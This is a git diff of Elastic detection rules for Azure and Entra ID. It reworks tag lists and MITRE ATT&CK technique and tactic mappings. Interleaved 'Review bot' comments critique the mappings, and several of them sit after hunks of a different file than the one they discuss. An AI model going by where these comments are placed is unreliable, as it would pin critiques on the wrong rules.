@@ -60,15 +60,7 @@ references = [ risk_score = 47 rule_id = "f766ffaf-9568-4909-b734-75d19b35cbf4" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -81,6 +73,7 @@ event.dataset: "azure.auditlogs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" @@ -91,13 +84,28 @@ id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml b/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml index fd409ec66bb..aa8729363c5 100644 --- a/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml 
+++ b/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "Changes in ECS added cloud.* fields which are not available prior to ^9.2.0" -updated_date = "2026/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -61,17 +61,7 @@ setup = """### Microsft Entra ID Audit Logs This rule requires the Azure integration with Microsoft Entra ID Audit Logs data stream ingesting in your Elastic Stack deployment. For more information, refer to the [Microsoft Entra ID Audit Logs integration documentation](https://www.elastic.co/docs/reference/integrations/azure/adlogs). """ severity = "high" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" 
@@ -91,36 +81,18 @@ from logs-azure.auditlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" -[[rule.threat.technique.subtechnique]] -id = "T1484.002" -name = "Trust Modification" -reference = "https://attack.mitre.org/techniques/T1484/002/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml b/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml index 2ca71e31d2f..d988f949290 100644 --- a/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml +++ b/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/03" integration = ["azure"] maturity = "development" -updated_date = "2026/03/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -71,17 +71,7 @@ setup = """### Microsoft Entra ID Audit Logs This rule requires the Azure integration with Microsoft Entra ID Audit Logs data stream ingesting in your Elastic Stack deployment. For more information, refer to the [Microsoft Entra ID Audit Logs integration documentation](https://www.elastic.co/docs/reference/integrations/azure/adlogs). """ severity = "high" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -95,33 +85,44 @@ event.dataset: azure.auditlogs [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.007" +name = "Hybrid Identity" +reference = "https://attack.mitre.org/techniques/T1556/007/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.007" +name = "Hybrid Identity" +reference = "https://attack.mitre.org/techniques/T1556/007/" [rule.threat.tactic] id = "TA0003" diff --git a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml index 0491e8e6a55..b0cd7cfb345 100644 --- a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml +++ b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,7 +57,7 @@ The Azure Fleet integration, Filebeat module, or similarly structured data is re risk_score = 21 rule_id = "774f5e28-7b75-4a58-b94e-41bf060fdd86" severity = "low" -tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Configuration Audit", "Tactic: Persistence", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -68,26 +68,26 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml index 0d51d53cae8..38a064cdfed 100644 
--- a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml +++ b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,7 +62,7 @@ references = [ risk_score = 21 rule_id = "38e5acdd-5f20-4d99-8fe4-f0a1a592077f" severity = "low" -tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Configuration Audit", "Tactic: Persistence", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -73,23 +73,36 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml index ab26fc86d1c..431d0f19a4c 100644 --- a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml +++ b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/16" integration = ["azure"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -58,16 +58,7 @@ setup = """#### Required Microsoft Entra ID Sign-In Logs This rule requires the Azure integration with Microsoft Entra ID Sign-In logs to be enabled and configured to collect audit and activity logs via Azure Event Hub. """ severity = "low" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Sign-in Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Identity", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-in Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" 
@@ -84,39 +75,39 @@ event.dataset: "azure.signinlogs" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.005" -name = "Device Registration" -reference = "https://attack.mitre.org/techniques/T1098/005/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.005" +name = "Device Registration" +reference = "https://attack.mitre.org/techniques/T1098/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.user_principal_name", diff --git a/rules/integrations/azure/persistence_event_hub_created_or_updated.toml b/rules/integrations/azure/persistence_event_hub_created_or_updated.toml index 6cf84594742..49921ba6a96 100644 --- a/rules/integrations/azure/persistence_event_hub_created_or_updated.toml +++ b/rules/integrations/azure/persistence_event_hub_created_or_updated.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -67,7 +67,7 @@ references = ["https://docs.microsoft.com/en-us/azure/event-hubs/authorize-acces
 risk_score = 47
 rule_id = "b6dce542-2b75-4ffb-b7d6-38787298ba9d"
 severity = "medium"
-tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Log Auditing", "Tactic: Persistence", "Resources: Investigation Guide"]
+tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Log Auditing", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
 
@@ -78,30 +78,36 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique.subtechnique]]
+id = "T1098.001"
+name = "Additional Cloud Credentials"
+reference = "https://attack.mitre.org/techniques/T1098/001/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
-[[rule.threat.technique.subtechnique]]
-id = "T1552.005"
-name = "Cloud Instance Metadata API"
-reference = "https://attack.mitre.org/techniques/T1552/005/"
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
 [rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
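Review bot: The new Privilege Escalation entry maps an `AUTHORIZATIONRULES/WRITE` on an Event Hub namespace to T1098.003 Additional Cloud Roles, but if I read the operation correctly an authorization rule is a shared-access policy (a key with rights on the namespace), not an RBAC role assignment, so T1098.001 Additional Cloud Credentials — the sub-technique the Persistence entry already uses — is the one that describes it. T1098 sits under both TA0003 and TA0004 in ATT&CK, so the cleaner fix is to repeat `id = "T1098.001"` / `name = "Additional Cloud Credentials"` under the TA0004 entry, or to drop that entry together with the `"Tactic: Privilege Escalation"` tag. Dropping the old TA0006 entry looks right — T1552.005 (instance metadata API) never described this event, and the old tags had no `Tactic: Credential Access` at all, which is presumably what the new tag check surfaced — but the replacement should not introduce a second loose mapping.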
diff --git a/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml b/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml
index fa59f5be650..aab5a627660 100644
--- a/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml
+++ b/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml
@@ -2,7 +2,7 @@ creation_date = "2025/07/14"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -52,16 +52,7 @@ references = ["https://dirkjanm.io/persisting-with-federated-credentials-entra-a
 risk_score = 47
 rule_id = "42c97e6e-60c3-11f0-832a-f661ea17fbcd"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Domain: Identity",
- "Data Source: Azure",
- "Data Source: Microsoft Graph",
- "Data Source: Microsoft Graph Activity Logs",
- "Use Case: Identity and Access Audit",
- "Resources: Investigation Guide",
- "Tactic: Persistence",
-]
+tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Graph", "Data Source: Microsoft Graph Activity Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
 
@@ -75,22 +66,29 @@ event.dataset: azure.graphactivitylogs and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1556"
 name = "Modify Authentication Process"
 reference = "https://attack.mitre.org/techniques/T1556/"
-[[rule.threat.technique.subtechnique]]
-id = "T1556.009"
-name = "Conditional Access Policies"
-reference = "https://attack.mitre.org/techniques/T1556/009/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["azure.graphactivitylogs.properties.user_principal_object_id"]
diff --git a/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml b/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml
index af9bc41d8c9..3b789ded337 100644
--- a/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml
+++ b/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml
@@ -2,7 +2,7 @@ creation_date = "2025/04/30"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -81,6 +81,7 @@ sequence with maxspan=5m
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
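Review bot: Dropping T1556.009 leaves both `rule.threat` entries at the bare T1556 level, so the mapping no longer says which authentication-process change the rule detects; Conditional Access Policies was the wrong sub-technique for an external-authentication-method (EAM) registration, but if the EAM is an external MFA provider the MFA sub-technique of T1556 would keep the precision — verify the id against the current ATT&CK matrix before adding it under both tactics. Separately, the new Persistence block has no blank line between `+framework = "MITRE ATT&CK"` and `+[[rule.threat.technique]]`, unlike the Defense Evasion block just above it and the other blocks this commit emits; add the blank so the file matches the rest.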
@@ -91,16 +92,6 @@ id = "T1098.005"
 name = "Device Registration"
 reference = "https://attack.mitre.org/techniques/T1098/005/"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
diff --git a/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml b/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml
index de9b0f23509..bfe260a8cfb 100644
--- a/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml
+++ b/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml
@@ -2,7 +2,7 @@ creation_date = "2025/09/15"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/09/15"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -65,14 +65,7 @@ references = [
 risk_score = 73
 rule_id = "1a1046f4-9257-11f0-9a42-f661ea17fbce"
 severity = "high"
-tags = [
- "Domain: Cloud",
- "Data Source: Azure",
- "Data Source: Azure Activity Logs",
- "Use Case: Identity and Access Audit",
- "Tactic: Privilege Escalation",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Azure Activity Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
 
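Review bot: Removing T1078/T1078.004 leaves this rule mapped only to T1098.005 Device Registration, yet the rule name and the `sequence with maxspan=5m` header say it correlates an Identity Protection alert on an existing account with the registration; the account-compromise half of that sequence is what Valid Accounts: Cloud Accounts covered. Keeping it costs no tag: T1078 is a Persistence technique in ATT&CK, so the `[[rule.threat.technique]]` block for `id = "T1078"` / `id = "T1078.004"` can stay under the existing TA0003 entry and the tag check still passes. If the removal is deliberate because the sequence matches on the device event only, that reasoning belongs in the commit message. The `[rule.threat.tactic]` table closing this entry continues outside the hunk.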
@@ -93,16 +86,34 @@ event.dataset: azure.activitylogs and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
 
 [rule.threat.tactic]
 id = "TA0004"
diff --git a/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml b/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml
index 0f07d5c9080..cff07282bae 100644
--- a/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml
+++ b/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml
@@ -2,7 +2,7 @@ creation_date = "2025/05/22"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -66,16 +66,7 @@ references = [
 risk_score = 73
 rule_id = "8d9c4128-372a-11f0-9d8f-f661ea17fbcd"
 severity = "high"
-tags = [
- "Domain: Cloud",
- "Domain: Identity",
- "Data Source: Azure",
- "Data Source: Microsoft Entra ID",
- "Data Source: Microsoft Entra ID Audit Logs",
- "Use Case: Identity and Access Audit",
- "Tactic: Privilege Escalation",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
 
@@ -90,22 +81,39 @@ event.dataset: azure.auditlogs
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["azure.auditlogs.properties.initiated_by.user.userPrincipalName"]
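Review bot: In the new Persistence block `+reference = "https://attack.mitre.org/tactics/TA0003/"` runs straight into `+[[rule.threat]]` with no separating blank line, while the identical insertion in the rbac-administrator rule earlier in this commit, and every other multi-entry block here, leaves one blank line between threat entries. Add the blank line so the file matches whatever formatter the rest of the commit was produced with. The mapping itself — T1098.003 under both TA0003 and TA0004, with the `"Tactic: Persistence"` tag added alongside — mirrors the other role-assignment rules and satisfies the new tag check.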
diff --git a/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml b/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml
index eae2f416a42..45a2e0961ab 100644
--- a/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml
+++ b/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml
@@ -2,7 +2,7 @@ creation_date = "2021/10/18"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Austin Songer"]
@@ -62,13 +62,7 @@ references = [
 risk_score = 21
 rule_id = "1c966416-60c1-436b-bfd0-e002fddbfd89"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: Azure",
- "Use Case: Identity and Access Audit",
- "Tactic: Privilege Escalation",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
 
@@ -82,30 +76,36 @@ event.outcome:(Success or success)
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique.subtechnique]]
+id = "T1098.006"
+name = "Additional Container Cluster Roles"
+reference = "https://attack.mitre.org/techniques/T1098/006/"
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique.subtechnique]]
+id = "T1098.006"
+name = "Additional Container Cluster Roles"
+reference = "https://attack.mitre.org/techniques/T1098/006/"
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/azure/resource_development_entra_id_custom_domain_added_and_verified.toml b/rules/integrations/azure/resource_development_entra_id_custom_domain_added_and_verified.toml
index d20e1c44577..0af5fcf3987 100644
--- a/rules/integrations/azure/resource_development_entra_id_custom_domain_added_and_verified.toml
+++ b/rules/integrations/azure/resource_development_entra_id_custom_domain_added_and_verified.toml
@@ -2,7 +2,7 @@ creation_date = "2026/03/03"
 integration = ["azure"]
 maturity = "development"
-updated_date = "2026/03/03"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -86,20 +86,3 @@ event.dataset: azure.auditlogs
 '''
 
 
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1584"
-name = "Compromise Infrastructure"
-reference = "https://attack.mitre.org/techniques/T1584/"
-[[rule.threat.technique.subtechnique]]
-id = "T1584.001"
-name = "Domains"
-reference = "https://attack.mitre.org/techniques/T1584/001/"
-
-
-
-[rule.threat.tactic]
-id = "TA0042"
-name = "Resource Development"
-reference = "https://attack.mitre.org/tactics/TA0042/"
